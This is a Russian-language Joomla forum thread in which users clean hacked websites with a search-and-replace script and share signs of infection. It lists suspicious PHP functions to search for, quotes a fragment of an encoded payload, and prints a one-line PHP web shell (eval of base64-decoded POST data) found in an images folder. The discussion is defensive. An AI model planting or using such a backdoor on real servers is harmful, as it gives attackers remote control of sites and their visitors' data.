0 Пользователей и 1 Гость просматривают эту тему.
  • 72 Ответов
  • 36458 Просмотров
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Но вы там не все указали )))
Цитировать
Код может быть обфусцирован, но разные eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 с абракадаброй тоже весьма привлекают внимание, как и вариации на тему file, fopen, readfile, file_get_contents, HttpRequest::send с чужими адресами.
источник
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Скажите пожалуйста, а поиск по регулярным выражениям в Вашем скрипте есть? Если есть, то какие переменные для задания регулярных выражений?
Пока нет, но я думал про это, так как нужно искать еще строки больше определенной длины (обфусцированный код или закодированный через base64_encode обычно имеет большую длину и без пробелов), вообще скрипт пригодится и для обычной работы с сайтом, часто возникает потребность найти в коде что-то, а без скачивания сайта или отдельных папок себе на компьютер не обойтись, есть наверное фтп клиенты с поиском по содержимому файов, но они будут работать намного медленнее чем скрипт, так как скрипт использует ресурсы сервера, а  фтп клиент домашнего компьютера на котором установлен. Если кому нужно можно переделать в компонент для Joomla.

icom, спасибо за скрипт! Если Вы не против оставлю заметку у себя на сайте

Пожалуйста, я не против
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Но вы там не все указали )))источник

вы правы, нужно расширить список подозрительных функций
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
Файл например может найти "eval(base64_decode("
а вот более eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlc уже не ищет, и еще добавляет слеш
а если нечего заменить просто удалить,  пробел ставить нельзя?
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Цитировать
Файл например может найти "eval(base64_decode("
а вот более eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlc уже не ищет, и еще добавляет слеш
исправил

Цитировать
а если нечего заменить просто удалить,  пробел ставить нельзя?
можно, а можно и ничего не ставить, просто галку "Заменить" поставить
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
Респект и +10 icom
Вот нашел такой линк 
Цитировать
$link  = base64_decode( JRequest::getVar( 'link', '', 'post', 'base64' ) );
Это может быть вредоносным кодом ?
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Код
Это может быть вредоносным кодом ?
не думаю, base64_decode сама по себе не опасна, а вот с функцией eval() да
*

MaxFarSeer

  • Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
Добрый вечер, спасибо за скрипт. Вопрос такой:
с помощью вашего скрипта подчистил код, поменял пароли на фтп. Искал только по строке, которая везде добавлялась:
Спойлер
[свернуть]

какие действия еще нужно провести? в теме идет речь о поиске шела и прочее, мне это не очень понятно. Иными словами, что еще нужно поискать/как поискать/логи какие то почитать? чтобы не было повторного заражения ?
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

!eX

  • Новичок
  • 7
  • 0 / 0
Использую утилиту: replace.zip
В поле: Текст поиска*: пишу полностью вредоносный код с ковычками.
Вопрос: Что указывать в поле -  "Текст замены:"
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Использую утилиту: replace.zip
В поле: Текст поиска*: пишу полностью вредоносный код с ковычками.
Вопрос: Что указывать в поле -  "Текст замены:"
А ссылочку?
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

!eX

  • Новичок
  • 7
  • 0 / 0
Имеется ввиду, использую утилиту  http://cmsdev.org/files/replace.zip о ней сообщалось в этой ветке. Предназначена для массового удаления вредоносного кода base64_decode. Не совсем понял, что писать в поле  "Текст замены:"
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
вредоносного кода base64_decode. Не совсем понял, что писать в поле  "Текст замены:"

 base64 как и md5 просто метод кодировки decode указывает что надо раскодировать (курим мануалы)
а сам вредоносный код идет дальше DQplcnJvcl9yZXB...........

Вот чистая Joomla 1.5.25 с оф сайта
Спойлер
[свернуть]
« Последнее редактирование: 30.01.2012, 15:40:03 от oriol »
*

zicale

  • Новичок
  • 3
  • 1 / 0
Ребята, спасибо огромное.
Replace - вещь!
Fls из темы http://joomlaforum.ru/index.php/topic,198048.msg1042877.html#msg1042877 класс!
Нужно их оба использовать, с помощью первой вычистил сайт от eval base с помощью второй нашел уязвимость в компоненте "Simple Spotlight" http://extensions.joomla.org/extensions/photos-a-images/images-rotators/11876 причем такая дыра - рай для хакера, шелл залить на раз - оставили форму загрузки картинок, причем скачал с оф.сайта дистрибутив, видимо не увидели просто.
*

fedor32

  • Новичок
  • 1
  • 0 / 0
проверьте папку images, там может быть файл post.php со следующим содержанием

<?php eval(base64_decode($_POST["php"])); ?>

Стирайте нахрен, из него и растут роги. У меня он был только в одном сайте, но были поражены все, которые лежали рядом
*

angemax

  • Захожу иногда
  • 140
  • 3 / 0
А мои сайты заразили, создав отдельные папки. На одном в корне была создана папка lib, в неё залит index.php с кодом:

Спойлер
[свернуть]

В этой же папке лежал .htaccess с записью:
Спойлер
[свернуть]

В результате работы в индексе поисковиков появились страницы с ключевыми запросами на варезники. И "наштамповано" было более 1000.

Есть ли вероятность того, что простое удаление этой папки, не решает проблему?
index.php в корне проверила, ничего подозрительного не увидела
*

maratishe

  • Осваиваюсь на форуме
  • 25
  • 0 / 1
Ребята. Я так и не понял...  Что штавить в "Текст замены"
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Ребята. Я так и не понял...  Что штавить в "Текст замены"
если стоит галка "Замена", то в файлах сайта "Текст поиска" будет заменен на "Текст замены", если в "Текст замены" ничего нет, то "Текст поиска" будет удален из файлов )
*

maratishe

  • Осваиваюсь на форуме
  • 25
  • 0 / 1
Ага сделал))  И сайд пос этого не работает ....
*

icom

  • Давно я тут
  • 830
  • 202 / 4
а что вы конкретно сделали? верните из бекапа
лучше скриптом не пользуйтесь, если не знаете для чего он
*

maratishe

  • Осваиваюсь на форуме
  • 25
  • 0 / 1
Ну вставлял: eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13.........

Нашёл много..

Потом поставил галкаку  "Замена"

в "Текст замены" ничаво не писал.

И все

Потом саид не работал  ERROR line 188
*

icom

  • Давно я тут
  • 830
  • 202 / 4
eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 это все функции php, которые используются как в самой Joomla так и в сторонних компонентах, если вы их нашли, то это не повод их удалять), лучше обратитесь к специалистам в этом вопросе, а сайт восстановите из бекапа, если его нет, то обратитесь к хостеру чтоб восстановил
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
хочу выяснить как происходит заражение (слежу 3 дня), у него 24 сайта на одном аккаунте, заражаются регулярно только три, через что мне казалось что взламывают не через фтп
Появилась идея, как взламывали? А то приехала точно такая же радость. Файлы меняли в два захода, логов за эти дни уже нет.
*

romashko1901

  • Новичок
  • 1
  • 0 / 0
чуть выше есть ответ: в папке images файл post.php спасибо :D автору за подсказку
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
чуть выше есть ответ: в папке images файл post.php
Это не ответ. Ответ звучит так: файл post.php попал на сервер в результате ...
Вот многоточие как раз и интересует. Сервер я вычистил, с июля тихо. Но как это Г. мне закинули - остаётся большим вопросом.
« Последнее редактирование: 12.10.2012, 05:16:28 от WebDisaster »
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Было бы что читать - давно бы вычитал. Я уже объяснил:
Файлы меняли в два захода, логов за эти дни уже нет.
Шелл закинули и он около двух месяцев (если судить по дате создания файла) тихо лежал. Когда им начали пользоваться, логов на дату создания файла уже не было.
*

Rmilovidov

  • Захожу иногда
  • 110
  • 1 / 0
  • Работаю на себя
Кто за определенную плату может полечтить сайт от вируса-редиректа?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

[Решено] Заразились в один день 4 аккаунта по 10 сайтов

Автор Stich SPb

Ответов: 356
Просмотров: 68500
Последний ответ 13.09.2019, 18:49:33
от diana1975
На мобильном не работает сайт (решено, ошибка в андройде)

Автор dragon4x4

Ответов: 5
Просмотров: 1269
Последний ответ 01.03.2018, 22:46:10
от dragon4x4
[Решено] Странный файл в Akeeba Backup - вирус?

Автор jimka

Ответов: 2
Просмотров: 1253
Последний ответ 31.05.2016, 17:39:15
от flyingspook
На сайте появилось перенаправление на нехороший сайт

Автор batot

Ответов: 5
Просмотров: 963
Последний ответ 26.11.2015, 19:34:21
от jlend
Проверка всех файлов на изменения

Автор kik84

Ответов: 8
Просмотров: 2599
Последний ответ 17.03.2015, 13:25:47
от kik84